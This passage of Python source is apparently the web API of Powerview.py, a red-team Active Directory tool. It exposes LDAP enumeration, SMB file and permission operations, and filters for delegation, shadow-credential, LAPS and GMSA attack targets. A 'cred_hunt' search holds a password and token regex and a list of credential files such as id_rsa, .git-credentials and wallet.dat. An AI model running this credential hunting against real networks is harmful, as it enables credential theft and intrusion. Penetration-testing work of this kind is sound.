		add_route_with_auth('/api/ldap/rebind', 'ldap_rebind', self.handle_ldap_rebind, methods=['GET'])
		add_route_with_auth('/api/ldap/close', 'ldap_close', self.handle_ldap_close, methods=['GET'])
		add_route_with_auth('/api/execute', 'execute_command', self.execute_command, methods=['POST'])
		add_route_with_auth('/api/constants', 'constants', self.handle_constants, methods=['GET'])
		add_route_with_auth('/api/clear-cache', 'clear_cache', self.handle_clear_cache, methods=['GET'])
		add_route_with_auth('/api/settings', 'settings', self.handle_settings, methods=['GET'])
		add_route_with_auth('/api/smb/connect', 'smb_connect', self.handle_smb_connect, methods=['POST'])
		add_route_with_auth('/api/smb/reconnect', 'smb_reconnect', self.handle_smb_reconnect, methods=['POST'])
		add_route_with_auth('/api/smb/disconnect', 'smb_disconnect', self.handle_smb_disconnect, methods=['POST'])
		add_route_with_auth('/api/smb/shares', 'smb_shares', self.handle_smb_shares, methods=['POST'])
		add_route_with_auth('/api/smb/add-share', 'smb_add_share', self.handle_smb_add_share, methods=['POST'])
		add_route_with_auth('/api/smb/delete-share', 'smb_delete_share', self.handle_smb_delete_share, methods=['POST'])
		add_route_with_auth('/api/smb/ls', 'smb_ls', self.handle_smb_ls, methods=['POST'])
		add_route_with_auth('/api/smb/mv', 'smb_mv', self.handle_smb_mv, methods=['POST'])
		add_route_with_auth('/api/smb/get', 'smb_get', self.handle_smb_get, methods=['POST'])
		add_route_with_auth('/api/smb/put', 'smb_put', self.handle_smb_put, methods=['POST'])
		add_route_with_auth('/api/smb/cat', 'smb_cat', self.handle_smb_cat, methods=['POST'])
		add_route_with_auth('/api/smb/rm', 'smb_rm', self.handle_smb_rm, methods=['POST'])
		add_route_with_auth('/api/smb/mkdir', 'smb_mkdir', self.handle_smb_mkdir, methods=['POST'])
		add_route_with_auth('/api/smb/rmdir', 'smb_rmdir', self.handle_smb_rmdir, methods=['POST'])
		add_route_with_auth('/api/smb/search', 'smb_search', self.handle_smb_search, methods=['POST'])
		add_route_with_auth('/api/smb/search-stream', 'smb_search_stream', self.handle_smb_search_stream, methods=['GET'])
		add_route_with_auth('/api/smb/sessions', 'smb_sessions', self.handle_smb_sessions, methods=['GET'])
		add_route_with_auth('/api/login_as', 'login_as', self.handle_login_as, methods=['POST'])
		add_route_with_auth('/api/smb/properties', 'smb_properties', self.handle_smb_properties, methods=['POST'])
		add_route_with_auth('/api/smb/set-security', 'smb_set_security', self.handle_smb_set_security, methods=['POST'])
		add_route_with_auth('/api/smb/remove-security', 'smb_remove_security', self.handle_smb_remove_security, methods=['POST'])
		add_route_with_auth('/api/smb/set-share-security', 'smb_set_share_security', self.handle_smb_set_share_security, methods=['POST'])
		add_route_with_auth('/api/smb/remove-share-security', 'smb_remove_share_security', self.handle_smb_remove_share_security, methods=['POST'])

	def set_status(self, status):
		self.status = status

	def get_status(self):
		return self.status

	def render_index(self):
		context = {
			'title': 'Powerview.py',
			'version': version,
			'nav_items': self.nav_items
		}
		return render_template('explorerpage.html', **context)
	
	def render_dashboard(self):
		context = {
			'title': 'Powerview.py - Dashboard',
			'version': version,
			'nav_items': self.nav_items
		}
		return render_template('dashboardpage.html', **context)

	def render_users(self):
		context = {
			'title': 'Powerview.py - Users',
			'nav_items': self.nav_items,
			'version': version,
			'ldap_properties': [
				{'id': 'all-toggle', 'name': 'All', 'active': 'false', 'attribute': '*'},
				{'id': 'samaccountname-toggle', 'name': 'sAMAccountname', 'active': 'true', 'attribute': 'sAMAccountName'},
				{'id': 'cn-toggle', 'name': 'cn', 'active': 'true', 'attribute': 'cn'},
				{'id': 'mail-toggle', 'name': 'mail', 'active': 'true', 'attribute': 'mail'},
				{'id': 'admincount-toggle', 'name': 'adminCount', 'active': 'true', 'attribute': 'adminCount'},
				{'id': 'userprincipalname-toggle', 'name': 'userPrincipalName', 'active': 'false', 'attribute': 'userPrincipalName'},
				{'id': 'useraccountcontrol-toggle', 'name': 'userAccountControl', 'active': 'false', 'attribute': 'userAccountControl'},
				{'id': 'objectclass-toggle', 'name': 'objectClass', 'active': 'false', 'attribute': 'objectClass'},
				{'id': 'description-toggle', 'name': 'description', 'active': 'false', 'attribute': 'description'},
				{'id': 'distinguishedname-toggle', 'name': 'distinguishedName', 'active': 'false', 'attribute': 'distinguishedName'},
				{'id': 'name-toggle', 'name': 'name', 'active': 'false', 'attribute': 'name'},
				{'id': 'objectguid-toggle', 'name': 'objectGUID', 'active': 'false', 'attribute': 'objectGUID'},
				{'id': 'objectsid-toggle', 'name': 'objectSid', 'active': 'false', 'attribute': 'objectSid'},
				{'id': 'title-toggle', 'name': 'title', 'active': 'false', 'attribute': 'title'},
				{'id': 'department-toggle', 'name': 'department', 'active': 'false', 'attribute': 'department'},
				{'id': 'company-toggle', 'name': 'company', 'active': 'false', 'attribute': 'company'},
				{'id': 'serviceprincipalname-toggle', 'name': 'servicePrincipalName', 'active': 'false', 'attribute': 'servicePrincipalName'},
				{'id': 'memberof-toggle', 'name': 'memberOf', 'active': 'false', 'attribute': 'memberOf'},
				{'id': 'accountexpires-toggle', 'name': 'accountExpires', 'active': 'false', 'attribute': 'accountExpires'}
			],
			'powerview_flags': [
				{'id': 'spn-toggle', 'name': 'SPN', 'active': 'false', 'attribute': 'servicePrincipalName'},
				{'id': 'trusted-to-auth-toggle', 'name': 'TrustedToAuth', 'active': 'false', 'attribute': 'trustedToAuth'},
				{'id': 'enabled-users-toggle', 'name': 'Enabled', 'active': 'false', 'attribute': 'enabled'},
				{'id': 'preauth-not-required-toggle', 'name': 'PreauthNotReq', 'active': 'false', 'attribute': 'preauthNotRequired'},
				{'id': 'pass-not-required-toggle', 'name': 'PasswdNotReq', 'active': 'false', 'attribute': 'passwordNotRequired'},
				{'id': 'admin-count-toggle', 'name': 'AdminCount', 'active': 'false', 'attribute': 'adminCount'},
				{'id': 'lockout-toggle', 'name': 'Lockout', 'active': 'false', 'attribute': 'lockout'},
				{'id': 'rbcd-toggle', 'name': 'RBCD', 'active': 'false', 'attribute': 'rbcd'},
				{'id': 'shadow-cred-toggle', 'name': 'Shadow Cred', 'active': 'false', 'attribute': 'shadowCred'},
				{'id': 'unconstrained-delegation-toggle', 'name': 'Unconstrained', 'active': 'false', 'attribute': 'unconstrainedDelegation'},
				{'id': 'disabled-users-toggle', 'name': 'Disabled', 'active': 'false', 'attribute': 'disabled'},
				{'id': 'password-expired-toggle', 'name': 'Password Expired', 'active': 'false', 'attribute': 'passwordExpired'}
			]
		}
		return render_template('userspage.html', **context)

	def render_computers(self):
		context = {
			'title': 'Powerview.py - Computers',
			'nav_items': self.nav_items,
			'version': version,
			'ldap_properties': [
				{'id': 'all-toggle', 'name': 'All', 'active': 'false', 'attribute': '*'},
				{'id': 'samaccountname-toggle', 'name': 'sAMAccountname', 'active': 'true', 'attribute': 'sAMAccountName'},
				{'id': 'cn-toggle', 'name': 'cn', 'active': 'true', 'attribute': 'cn'},
				{'id': 'operatingsystem-toggle', 'name': 'operatingSystem', 'active': 'true', 'attribute': 'operatingSystem'},
				{'id': 'description-toggle', 'name': 'description', 'active': 'false', 'attribute': 'description'},
				{'id': 'useraccountcontrol-toggle', 'name': 'userAccountControl', 'active': 'false', 'attribute': 'userAccountControl'},
				{'id': 'serviceprincipalname-toggle', 'name': 'servicePrincipalName', 'active': 'false', 'attribute': 'servicePrincipalName'},
				{'id': 'memberof-toggle', 'name': 'memberOf', 'active': 'false', 'attribute': 'memberOf'}
			],
			'powerview_flags': [
				{'id': 'spn-toggle', 'name': 'SPN', 'active': 'false', 'attribute': 'servicePrincipalName'},
				{'id': 'trusted-to-auth-toggle', 'name': 'Trusted To Auth', 'active': 'false', 'attribute': 'trustedToAuth'},
				{'id': 'enabled-computers-toggle', 'name': 'Enabled', 'active': 'false', 'attribute': 'enabled'},
				{'id': 'rbcd-toggle', 'name': 'RBCD', 'active': 'false', 'attribute': 'rbcd'},
				{'id': 'shadow-cred-toggle', 'name': 'Shadow Cred', 'active': 'false', 'attribute': 'shadowCred'},
				{'id': 'unconstrained-delegation-toggle', 'name': 'Unconstrained', 'active': 'false', 'attribute': 'unconstrainedDelegation'},
				{'id': 'disabled-computers-toggle', 'name': 'Disabled', 'active': 'false', 'attribute': 'disabled'},
				{'id': 'laps-toggle', 'name': 'LAPS', 'active': 'false', 'attribute': 'laps'},
				{'id': 'printers-toggle', 'name': 'Printers', 'active': 'false', 'attribute': 'printers'},
				{'id': 'bitlocker-toggle', 'name': 'Bitlocker', 'active': 'false', 'attribute': 'bitlocker'},
				{'id': 'gmsapassword-toggle', 'name': 'GMSA Password', 'active': 'false', 'attribute': 'gmsaPassword'},
				{'id': 'pre2k-toggle', 'name': 'Pre-2k', 'active': 'false', 'attribute': 'pre2k'},
				{'id': 'excludedcs-toggle', 'name': 'Exclude DC', 'active': 'false', 'attribute': 'excludeDC'}
			]
		}
		return render_template('computerpage.html', **context)

	def render_dns(self):
		context = {
			'title': 'Powerview.py - DNS',
			'nav_items': self.nav_items,
			'version': version,
		}
		return render_template('dnspage.html', **context)

	def render_groups(self):
		context = {
			'title': 'Powerview.py - Groups',
			'nav_items': self.nav_items,
			'version': version,
		}
		return render_template('grouppage.html', **context)

	def render_ca(self):
		context = {
			'title': 'Powerview.py - CA',
			'nav_items': self.nav_items,
			'version': version,
		}
		return render_template('capage.html', **context)

	def render_ou(self):
		context = {
			'title': 'Powerview.py - OUs',
			'nav_items': self.nav_items,
			'version': version,
		}
		return render_template('oupage.html', **context)

	def render_gpo(self):
		context = {
			'title': 'Powerview.py - GPOs',
			'nav_items': self.nav_items,
			'version': version,
		}
		return render_template('gpopage.html', **context)

	def render_smb(self):
		context = {
			'title': 'Powerview.py - SMB',
			'nav_items': self.nav_items,
			'version': version,
		}
		return render_template('smbpage.html', **context)

	def render_utils(self):
		context = {
			'title': 'Powerview.py - Utils',
			'nav_items': self.nav_items,
			'version': version,
		}
		return render_template('utilspage.html', **context)

	def handle_get_operation(self, method_name):
		return self.handle_operation(f"get_{method_name}")

	def handle_set_operation(self, method_name):
		return self.handle_operation(f"set_{method_name}")

	def handle_add_operation(self, method_name):
		return self.handle_operation(f"add_{method_name}")

	def handle_invoke_operation(self, method_name):
		return self.handle_operation(f"invoke_{method_name}")

	def handle_remove_operation(self, method_name):
		return self.handle_operation(f"remove_{method_name}")

	def handle_convert_from_operation(self, method_name):
		return self.handle_operation(f"convertfrom_{method_name}")

	def handle_convert_to_operation(self, method_name):
		return self.handle_operation(f"convertto_{method_name}")

	def handle_start_operation(self, method_name):
		return self.handle_operation(f"start_{method_name}")

	def handle_stop_operation(self, method_name):
		return self.handle_operation(f"stop_{method_name}")

	def handle_constants(self):
		get_param = request.args.get('get', '')
		if get_param.lower() == 'uac':
			return jsonify(UAC_DICT)
		return jsonify({})

	def handle_domaininfo(self):
		domain_info = {
			'domain': self.powerview.domain,
			'root_dn': self.powerview.root_dn,
			'dc_dnshostname': self.powerview.dc_dnshostname,
			'flatName': self.powerview.flatName,
		}
		return jsonify(domain_info)
	
	def handle_clear_cache(self):
		success = self.powerview.clear_cache()
		return jsonify({'status': 'OK' if success else 'KO'}), 200 if success else 400
	
	def handle_settings(self):
		# return all self.powerview.args in json
		return jsonify(vars(self.powerview.args))
	
	def handle_server_info(self):
		server_info = self.powerview.conn.ldap_server.info
		
		return jsonify({
			'supported_ldap_versions': server_info.supported_ldap_versions,
			'naming_contexts': server_info.naming_contexts,
			'supported_controls': server_info.supported_controls,
			'supported_extensions': server_info.supported_extensions,
			'supported_features': server_info.supported_features,
			'supported_sasl_mechanisms': server_info.supported_sasl_mechanisms,
			'schema_entry': server_info.schema_entry,
			'other': dict(server_info.other) if server_info.other else {}
		})

	def handle_set_settings(self):
		try:
			obfuscate = request.json.get('obfuscate', False)
			no_cache = request.json.get('no_cache', False)
			no_vuln_check = request.json.get('no_vuln_check', False)
			logging.info(f"obfuscate: {obfuscate}, no_cache: {no_cache}, no_vuln_check: {no_vuln_check}")
			
			# Update powerview args
			self.powerview.args.obfuscate = obfuscate
			self.powerview.args.no_cache = no_cache
			self.powerview.args.no_vuln_check = no_vuln_check
			
			# Create new CustomExtendedOperationsRoot instance with updated settings
			self.powerview.custom_paged_search = CustomExtendedOperationsRoot(self.powerview.ldap_session, obfuscate=obfuscate, no_cache=no_cache, no_vuln_check=no_vuln_check)
			self.powerview.ldap_session.extend.standard = self.powerview.custom_paged_search.standard
			
			return jsonify({'status': 'OK'})
		except Exception as e:
			logging.error(f"Error setting settings: {str(e)}")
			return jsonify({'error': str(e)}), 400

	def handle_connection_info(self):
		return jsonify({
			'domain': self.powerview.domain,
			'username': self.powerview.conn.get_username(),
			'is_admin': self.powerview.is_admin,
			'status': 'OK' if self.powerview.conn.is_connection_alive() else 'KO',
			'protocol': self.powerview.conn.get_proto(),
			'ldap_address': self.powerview.conn.get_ldap_address(),
			'nameserver': self.powerview.conn.get_nameserver(),
		})

	def execute_command(self):
		properties = [
			''
		]
		try:
			# Get the command from the request
			command = request.json.get('command', '')
			if not command:
				return jsonify({'error': 'No command provided'}), 400

			# Parse the command using shlex
			try:
				cmd = shlex.split(command)
			except ValueError as e:
				logging.error(f"Command parsing error: {str(e)}")
				return jsonify({'error': f'Command parsing error: {str(e)}'}), 400

			# Parse the command arguments using PowerView's argument parser
			pv_args = powerview_arg_parse(cmd)

			# Check if the command was parsed successfully
			if pv_args is None:
				return jsonify({'error': 'Invalid command or arguments'}), 400

			# Check if the module is specified
			if not pv_args.module:
				return jsonify({'error': 'No module specified in the command'}), 400

			# Execute the command using PowerView
			result = self.powerview.execute(pv_args)

			# Make the result serializable
			serializable_result = make_serializable(result)

			# Return the result along with pv_args
			return jsonify({'result': serializable_result, 'pv_args': vars(pv_args)}), 200

		except Exception as e:
			logging.error(f"Error executing command: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_health(self):
		return jsonify({'status': 'ok'})

	def handle_ldap_rebind(self):
		success = self.powerview.conn.reset_connection()
		return jsonify({'status': 'OK' if success else 'KO'}), 200 if success else 400

	def handle_ldap_close(self):
		success = self.powerview.conn.close()
		return jsonify({'status': 'OK' if success else 'KO'}), 200 if success else 400

	def render_history(self):
		try:
			with open(self.history_file_path, 'r') as history_file:
				history_lines = history_file.readlines()
				last_50_lines = history_lines[-50:]
				history = [line.strip() for line in last_50_lines]
			return jsonify({'result': history})
		except Exception as e:
			return jsonify({'error': str(e)}), 500

	def generate_log_stream(self):
		try:
			page = int(request.args.get('page', 1))
			limit = int(request.args.get('limit', 10))

			max_limit = 100
			if limit > max_limit:
				raise ValueError(f"Limit of {limit} exceeds the maximum allowed value of {max_limit}")

			with open(self.log_file_path, 'r') as log_file:
				all_logs = log_file.readlines()

			total_logs = len(all_logs)
			start = total_logs - (page * limit)
			end = start + limit

			if start < 0:
				start = 0

			paginated_logs = all_logs[start:end][::-1]  # Reverse the order to get the most recent logs first

			formatted_logs = []
			for log in paginated_logs:
				parts = log.split(' ', 3)
				if len(parts) >= 4:
					timestamp = parts[0] + ' ' + parts[1]
					user = parts[2]
					log_type = parts[3].split(' ', 1)[0]
					debug_message = parts[3].split(' ', 1)[1].strip() if len(parts[3].split(' ', 1)) > 1 else ''
					formatted_logs.append({
						'timestamp': timestamp.strip('[]'),
						'user': user,
						'log_type': log_type,
						'debug_message': debug_message
					})

			return jsonify({'logs': formatted_logs, 'total': total_logs, 'page': page, 'limit': limit})
		except Exception as e:
			return jsonify({'error': str(e)}), 500

	def handle_operation(self, full_method_name):
		method = getattr(self.powerview, full_method_name, None)
		
		if not method:
			return jsonify({'error': f'Method {full_method_name} not found'}), 404

		params = request.args.to_dict() if request.method == 'GET' else request.json or {}

		if 'args' in params:
			params['args'] = Namespace(**params['args'])
		
		try:
			result = method(**params)
			serializable_result = make_serializable(result)
			return jsonify(serializable_result)
		except Exception as e:
			if self.powerview.args.stack_trace:
				raise e
			else:
				logging.error(f"Powerview API Error: {full_method_name}: {str(e)}")
			return jsonify({'error': str(e)}), 400

	def start(self):
		log = logging.getLogger('werkzeug')
		log.disabled = True

		with redirect_stdout(io.StringIO()), redirect_stderr(io.StringIO()):
			self.api_server_thread = threading.Thread(
				target=self.app.run,
				kwargs={'host': self.host, 'port': self.port, 'debug': False},
				daemon=True
			)
			self.set_status(True)
			logging.info(f"Powerview web listening on {self.host}:{self.port}")
			self.api_server_thread.start()

	def handle_smb_connect(self):
		try:
			data = request.json
			computer = data.get('computer').lower()
			username = data.get('username')
			password = data.get('password')
			nthash = data.get('nthash')
			lmhash = data.get('lmhash')
			aesKey = data.get('aesKey')
			domain = data.get('domain')

			if username and ('/' in username or '\\' in username):
				domain, username = username.replace('/', '\\').split('\\')
			
			if not computer:
				return jsonify({'error': 'Computer name/IP is required'}), 400

			host = computer
			is_fqdn = False

			if not is_ipaddress(computer):
				is_fqdn = True
				if not is_valid_fqdn(computer):
					host = f"{computer}.{self.powerview.domain}"
				else:
					host = computer
				logging.debug(f"[SMB Connect] Using FQDN: {host}")

			if self.powerview.conn.use_kerberos and is_ipaddress(computer):
				return jsonify({'error': 'FQDN must be used for kerberos authentication'}), 400

			try:
				client = self.powerview.conn.init_smb_session(
					host,
					username=username,
					password=password,
					nthash=nthash,
					lmhash=lmhash,
					aesKey=aesKey,
					domain=domain
				)
			except Exception as conn_error:
				if is_fqdn and not is_ipaddress(host):
					ip = host2ip(host, self.powerview.nameserver, 3, True, 
								use_system_ns=self.powerview.use_system_nameserver, no_prompt=True)
					if not ip:
						return jsonify({'error': 'Host not found'}), 404
					
					logging.debug(f"[SMB Connect] Initial connection failed, trying IP: {ip}")
					client = self.powerview.conn.init_smb_session(
						ip,
						username=username,
						password=password,
						nthash=nthash,
						lmhash=lmhash,
						aesKey=aesKey,
						domain=domain
					)
					host = ip
				else:
					raise conn_error
			
			if not client:
				return jsonify({'error': f'Failed to connect to {host}'}), 400

			return jsonify({
				'status': 'connected',
				'host': host
			})

		except Exception as e:
			logging.error(f"SMB Connect Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_reconnect(self):
		try:
			data = request.json
			computer = data.get('computer').lower()
			
			if not computer:
				return jsonify({'error': 'Computer name/IP is required'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer, force_new=True)
				logging.debug(f"SMB Reconnect: Successfully reconnected to {computer}")
				return jsonify({'status': 'reconnected'})
			except Exception as e:
				logging.error(f"SMB Reconnect: Failed to reconnect to {computer}: {str(e)}")
				return jsonify({'error': 'Failed to reconnect'}), 500
		except Exception as e:
			logging.error(f"SMB Reconnect Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_disconnect(self):
		try:
			data = request.json
			computer = data.get('computer').lower()
			
			if not computer:
				return jsonify({'error': 'Computer name/IP is required'}), 400

			self.powerview.conn.remove_smb_connection(computer)
			return jsonify({'status': 'disconnected'})
		except Exception as e:
			logging.error(f"SMB Disconnect Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_shares(self):
		try:
			data = request.json
			host = data.get('computer').lower()
			
			if not host:
				return jsonify({'error': 'Computer name/IP is required'}), 400

			try:
				client = self.powerview.conn.init_smb_session(host)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)
			shares = smb_client.shares()

			# Format shares similar to get_netshare
			formatted_shares = []
			for share in shares:
				entry = {
					"Name": share['shi1_netname'][:-1],
					"Remark": share['shi1_remark'][:-1],
					"Address": host
				}
				formatted_shares.append({"attributes": entry})

			return jsonify(formatted_shares)

		except Exception as e:
			logging.error(f"SMB Shares Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_add_share(self):
		try:
			data = request.json
			computer = data.get('computer', '').lower()
			share_name = data.get('share_name')
			share_path = data.get('share_path')
			
			if not all([computer, share_name, share_path]):
				return jsonify({'error': 'Computer name/IP, share name, and share path are required'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)
			
			try:
				result = smb_client.add_share(share_name, share_path)
				if result:
					return jsonify({
						'status': 'success', 
						'message': f'Share "{share_name}" created successfully at path "{share_path}"'
					}), 200
				else:
					return jsonify({'error': 'Failed to create share'}), 500
			except Exception as e:
				return jsonify({'error': f'Failed to create share: {str(e)}'}), 500

		except Exception as e:
			logging.error(f"[SMB ADD SHARE] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_delete_share(self):
		try:
			data = request.json
			computer = data.get('computer', '').lower()
			share = data.get('share')
			
			if not all([computer, share]):
				return jsonify({'error': 'Computer name/IP and share name are required'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)
			
			try:
				result = smb_client.delete_share(share)
				if result:
					return jsonify({'status': 'success', 'message': 'Share deleted successfully'}), 200
				else:
					return jsonify({'error': 'Failed to delete share'}), 500
			except Exception as e:
				return jsonify({'error': f'Failed to delete share: {str(e)}'}), 500

		except Exception as e:
			logging.error(f"[SMB DELETE SHARE] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_ls(self):
		try:
			data = request.json
			host = data.get('computer').lower()
			share = data.get('share')
			path = data.get('path', '')
			
			if not host or not share:
				return jsonify({'error': 'Computer name/IP and share name are required'}), 400

			try:
				client = self.powerview.conn.init_smb_session(host)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400
			
			smb_client = SMBClient(client)
			
			files = smb_client.ls(share, path)
			logging.debug(f"[SMB LS] Listing {path} on {host} with share {share}")
			
			file_list = []
			for f in files:
				name = f.get_longname()
				if name in ['.', '..']:
					continue
				
				file_info = {
					"name": name,
					"size": f.get_filesize(),
					"is_directory": f.is_directory(),
					"created": str(f.get_ctime()),
					"modified": str(f.get_mtime()),
					"accessed": str(f.get_atime())
				}
				file_list.append(file_info)

			return jsonify(file_list)

		except Exception as e:
			logging.error(f"[SMB LS] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_mv(self):
		try:
			data = request.json
			computer = data.get('computer').lower()
			share = data.get('share')
			source = data.get('source')
			destination = data.get('destination')

			if not all([computer, share, source, destination]):
				return jsonify({'error': 'Missing required parameters'}), 400
				
			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)

			smb_client.mv(share, source, destination)	
			return jsonify({'message': 'File moved successfully'})
	
		except Exception as e:
			logging.error(f"[SMB MV] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_get(self):
		try:
			data = request.json
			host = data.get('computer').lower()
			share = data.get('share')
			path = data.get('path')
			
			if not host or not share or not path:
				return jsonify({'error': 'Computer name/IP, share name, and file path are required'}), 400

			try:
				client = self.powerview.conn.init_smb_session(host)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)
			
			try:
				file_content = smb_client.get(share, path)
				
				# Get the filename from the path
				filename = os.path.basename(path)
				
				# Create a response with the file content
				response = Response(
					file_content,
					mimetype='application/octet-stream',
					headers={
						'Content-Disposition': f'attachment; filename="{filename}"',
						'Content-Length': len(file_content)
					}
				)
				
				return response

			except Exception as e:
				logging.error(f"[SMB GET] Error reading file {path}: {str(e)}")
				return jsonify({'error': f'Failed to read file: {str(e)}'}), 500

		except Exception as e:
			logging.error(f"[SMB GET] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_put(self):
		try:
			computer = request.form.get('computer').lower()
			share = request.form.get('share')
			file = request.files.get('file')
			current_path = request.form.get('path', '')
			
			if not computer or not share:
				return jsonify({'error': 'Computer name/IP and share name are required'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)
			
			# Save file temporarily
			temp_path = os.path.join('/tmp', file.filename)
			file.save(temp_path)
			
			try:
				# Construct the remote path correctly
				# current_path might be like "/FolderA" or "" for root
				# file.filename is the original filename
				clean_dest_dir = current_path.strip('/').replace('/', '\\')
				remote_target_path = os.path.join(clean_dest_dir, file.filename).replace('/', '\\')
				
				logging.debug(f"[SMB PUT] Uploading {temp_path} to share '{share}', path: '{remote_target_path}'")
				
				# Reverting to the 3-argument call based on [Errno 2] indicating the path was likely accessed
				# without the correct share context.
				# Assumed signature: put(self, share_name, remote_path_in_share, local_path)
				smb_client.put(share, remote_target_path, temp_path)
				
				return jsonify({'message': 'File uploaded successfully'})
			finally:
				# Clean up temporary file
				if os.path.exists(temp_path):
					os.remove(temp_path)

		except Exception as e:
			logging.error(f"[SMB PUT] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_cat(self):
		try:
			data = request.json
			computer = data.get('computer').lower()
			share = data.get('share')
			path = data.get('path')

			if not all([computer, share, path]):
				return jsonify({'error': 'Missing required parameters'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)
			content = smb_client.cat(share, path)
			if content is None:
				return jsonify({'error': 'Failed to read file content'}), 500

			return content, 200

		except Exception as e:
			logging.error(f"Error reading file content: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_rm(self):
		try:
			data = request.json
			computer = data.get('computer').lower()
			share = data.get('share')
			path = data.get('path')

			if not all([computer, share, path]):
				return jsonify({'error': 'Missing required parameters'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)
			
			try:
				# Delete file over SMB
				smb_client.rm(share, path)
				return jsonify({'message': 'File deleted successfully'})
			except Exception as e:
				return jsonify({'error': f'Failed to delete file: {str(e)}'}), 500

		except Exception as e:
			logging.error(f"[SMB RM] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_mkdir(self):
		try:
			data = request.json
			computer = data.get('computer').lower()
			share = data.get('share')
			path = data.get('path')

			if not all([computer, share, path]):
				return jsonify({'error': 'Missing required parameters'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)
			
			try:
				# Create directory over SMB
				smb_client.mkdir(share, path)
				return jsonify({'message': 'Directory created successfully'})
			except Exception as e:
				return jsonify({'error': f'Failed to create directory: {str(e)}'}), 500

		except Exception as e:
			logging.error(f"[SMB MKDIR] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_rmdir(self):
		try:
			data = request.json
			computer = data.get('computer').lower()
			share = data.get('share')
			path = data.get('path')

			if not all([computer, share, path]):
				return jsonify({'error': 'Missing required parameters'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)
			
			try:
				# Delete directory over SMB
				smb_client.rmdir(share, path)
				return jsonify({'message': 'Directory deleted successfully'})
			except Exception as e:
				return jsonify({'error': f'Failed to delete directory: {str(e)}'}), 500

		except Exception as e:
			logging.error(f"[SMB RMDIR] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_search(self):
		try:
			data = request.json
			host = data.get('computer', '').lower()
			share = data.get('share')
			query = data.get('query')
			depth = int(data.get('depth', 3))
			start_path = data.get('start_path', '')
			use_regex = data.get('use_regex', False)
			content_search = data.get('content_search', False)
			case_sensitive = data.get('case_sensitive', False)
			cred_hunt = data.get('cred_hunt', False)
			item_type = data.get('item_type', 'all')
			max_file_size = int(data.get('max_file_size', 5 * 1024 * 1024))  # Default 5MB
			file_extensions = data.get('file_extensions', ['.txt', '.cfg', '.conf', '.config', '.xml', '.json', '.ini', '.ps1', '.bat', '.cmd', '.vbs', '.js', '.html', '.htm', '.log', '.sql', '.yml', '.yaml'])
			
			# If cred_hunt mode is enabled, set predefined patterns and options
			if cred_hunt:
				content_search = True
				use_regex = True
				if not query:
					query = r"(?i)(password|passwd|pwd|pass|cred|credential|secret|key|token|api[-_]?key|admin|root|adm)[=:].*"
				credential_file_patterns = [
					"id_rsa", "id_dsa", ".npmrc", ".pypirc", "credentials.json", "credentials.xml", "creds.txt", 
					"password", "passwd", "htpasswd", ".rdp", ".pgpass", ".git-credentials", "debug.log", 
					"web.config", ".env", "oauth", "wallet.dat", "*.pfx", "*.p12", "*.pkcs12", "*.key"
				]
				special_files = [".bash_history", ".zsh_history", ".netrc", "hosts", "authorized_keys", "known_hosts"]
			
			# Sanitize and normalize paths to prevent traversal attacks
			if '..' in start_path:
				start_path = start_path.replace('..', '')
			start_path = start_path.replace('\\\\', '\\').replace('//', '/')
			
			if not host or not share:
				return jsonify({'error': 'Computer and share are required'}), 400
				
			if not query and not cred_hunt:
				return jsonify({'error': 'Query is required or cred_hunt must be enabled'}), 400

			try:
				client = self.powerview.conn.init_smb_session(host)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)
			
			mode = "cred_hunt" if cred_hunt else "content+regex" if content_search and use_regex else "content" if content_search else "regex" if use_regex else "pattern"
			case_mode = "case-sensitive" if case_sensitive else "case-insensitive"
			logging.info(f"[SMB SEARCH] Starting {mode} ({case_mode}) search on {host}\\{share} (depth {depth}){' for pattern ' + query if query else ''}")
			
			found_items = []
			visited_paths = set()
			error_paths = set()
			
			# Compile regex if using regex search
			regex_pattern = None
			if use_regex:
				try:
					import re
					regex_flags = re.MULTILINE
					if not case_sensitive:
						regex_flags |= re.IGNORECASE
